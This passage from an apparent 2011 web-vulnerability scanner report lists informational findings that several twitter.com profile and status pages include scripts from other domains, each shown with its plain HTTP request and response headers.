X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.371. http://twitter.com/Simply_b06/status/29173383425949696

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Simply_b06/status/29173383425949696

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Simply_b06/status/29173383425949696 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225011-27514-8303
ETag: "296e04489c61ead9a1933e485fa4bd22"
Last-Modified: Fri, 28 Jan 2011 14:30:11 GMT
X-Runtime: 0.07568
Content-Type: text/html; charset=utf-8
Content-Length: 13710
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vU2ltcGx5X2Iw%250ANi9zdGF0dXMvMjkxNzMzODM0MjU5NDk2OTY6DGNzcmZfaWQiJTVlM2JiNjY4%250ANWU3MmNhZmY3NzhhY2E3ODRiNDgwODdhOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--6d295a54df06def6a97568ac94ecdce0d4dc8a97; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.372. http://twitter.com/Simply_b06/status/29173383425949696

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Simply_b06/status/29173383425949696

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Simply_b06/status/29173383425949696 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234596-16868-23421
ETag: "d0ff05884b63e709e06668dcb7001785"
Last-Modified: Fri, 28 Jan 2011 17:09:56 GMT
X-Runtime: 0.07980
Content-Type: text/html; charset=utf-8
Content-Length: 13580
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vU2ltcGx5X2Iw%250ANi9zdGF0dXMvMjkxNzMzODM0MjU5NDk2OTY6FWluX25ld191c2VyX2Zsb3cw%250AOgxjc3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoM%250AdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5%250AYzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgz%250ATvDMLQE%253D--5337bd74a80b6d00492c33d51a083c0601ae7f45; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.373. http://twitter.com/Siobhan_Magnus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Siobhan_Magnus

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Siobhan_Magnus HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266023-80188-44224
ETag: "ccd41e2f423be9ffd34f56366edc99cd"
Last-Modified: Sat, 29 Jan 2011 01:53:43 GMT
X-Runtime: 0.00959
Content-Type: text/html; charset=utf-8
Content-Length: 49563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.374. http://twitter.com/SlexAxton

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /SlexAxton

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SlexAxton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225045-59196-5393
ETag: "507dff22fcced375038cdd9631235460"
Last-Modified: Fri, 28 Jan 2011 14:30:45 GMT
X-Runtime: 0.00969
Content-Type: text/html; charset=utf-8
Content-Length: 49927
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.375. http://twitter.com/StarWrit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /StarWrit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /StarWrit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265998-47037-26209
ETag: "98f418b00049e64d718057714c24d78d"
Last-Modified: Sat, 29 Jan 2011 01:53:18 GMT
X-Runtime: 0.01212
Content-Type: text/html; charset=utf-8
Content-Length: 69129
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.376. http://twitter.com/Support

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Support

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Support HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-79439-58935
ETag: "6f3f0f6d45a5a9149a4d122ad96ea840"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.01685
Content-Type: text/html; charset=utf-8
Content-Length: 51752
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296099941/javascripts/twitter.js?1296104033" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296099941/javascripts/lib/jquery.tipsy.min.js?1296104033" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296099941/javascripts/lib/gears_init.js?1296104033" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296099941/javascripts/lib/mustache.js?1296104033" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296099941/javascripts/geov1.js?1296104033" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296099941/javascripts/api.js?1296104033" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296099941/javascripts/lib/mustache.js?1296104033" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296099941/javascripts/dismissable.js?1296104033" type="text/javascript"></script>
...[SNIP]...

18.377. http://twitter.com/Svantasukhai

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Svantasukhai

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Svantasukhai HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-92538-25020
ETag: "b5b7378e54ede43eec0f6508eb5d2185"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.00759
Content-Type: text/html; charset=utf-8
Content-Length: 29522
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.378. http://twitter.com/THE_REAL_SHAQ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /THE_REAL_SHAQ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /THE_REAL_SHAQ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:44:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265476-22093-12798
ETag: "2292bad8ff862731407148084ee7d5a9"
Last-Modified: Sat, 29 Jan 2011 01:44:36 GMT
X-Runtime: 0.00794
Content-Type: text/html; charset=utf-8
Content-Length: 49010
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
